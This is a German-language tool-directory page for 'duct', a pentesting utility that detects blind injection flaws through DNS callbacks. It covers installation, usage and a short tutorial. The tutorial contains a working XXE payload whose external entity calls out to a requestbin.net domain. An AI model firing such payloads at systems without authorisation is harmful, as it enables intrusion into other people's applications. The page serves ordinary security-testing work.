Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
duct — Unverzichtbares Werkzeug zum Auffinden von Blind-Injection-Angriffen. | Kitploit
Tools/GitHubGitHub/pownjs/duct
Webanwendungs-ExploitationInformationsbeschaffungDNS-Analyse
GitHubpownjs/duct

duct

Unverzichtbares Werkzeug zum Auffinden von Blind-Injection-Angriffen.

Repository anzeigen
4913vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Follow on Twitter NPM Fury

Pown Duct

Wichtiges Werkzeug zum Auffinden von Blind-Injection-Angriffen mittels DNS-Seitenkanälen.

Credits

Dieses Tool ist Teil der Open-Source-Initiative von secapps.com.

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

NB: Dieses Tool nutzt den Dienst http://requestbin.net aus. Zukünftige Versionen werden eine eigene, speziell angepasste Infrastruktur verwenden.

Quickstart

Dieses Tool ist für die Verwendung als Teil von Pown.js gedacht, kann aber auch als eigenständiges Tool aufgerufen werden.

Installieren Sie zuerst Pown wie gewohnt:

root@kitploit:~
$ npm install -g pown@latest

Direkt von Pown aus aufrufen:

root@kitploit:~
$ pown duct

Alternativ installieren Sie dieses Modul lokal im Stammverzeichnis Ihres Projekts:

root@kitploit:~
$ npm install @pown/duct --save

Rufen Sie danach die Pown-CLI auf:

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

Sie können auch das globale Pown verwenden, um das Tool lokal aufzurufen:

root@kitploit:~
$ POWN_ROOT=. pown duct

Verwendung

root@kitploit:~
pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial

Es gibt Fälle, in denen wir einen Angriff wie SQL-Injection, XSS, XXE oder SSRF durchführen müssen, die Zielanwendung jedoch keinen Hinweis darauf gibt, dass sie verwundbar ist. Eine Möglichkeit, sicherzustellen, ob eine Schwachstelle vorhanden ist, besteht darin, einen gültigen Angriffsvektor zu injizieren, der einen DNS-Resolver dazu zwingt, eine kontrollierte Domain abzufragen. Wenn die Auflösung erfolgreich ist, gilt der Angriff als erfolgreich.

HINWEIS: Möglicherweise kennen Sie Burp Collaborator, das einen ähnlichen Dienst für Kunden bereitstellt.

Zuerst benötigen wir einen temporären DNS-Namen zur Auflösung:

root@kitploit:~
$ pown duct dns

screenshot

Erstellen Sie mit dem bereitgestellten DNS Ihre Payload. Das folgende Beispiel könnte z. B. eine DNS-Auflösung auslösen, wenn eine XXE-Schwachstelle vorhanden ist.

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

Wenn der Angriff erfolgreich war, erhalten wir eine Nachricht im Terminal.

screenshot

Tool herunterladen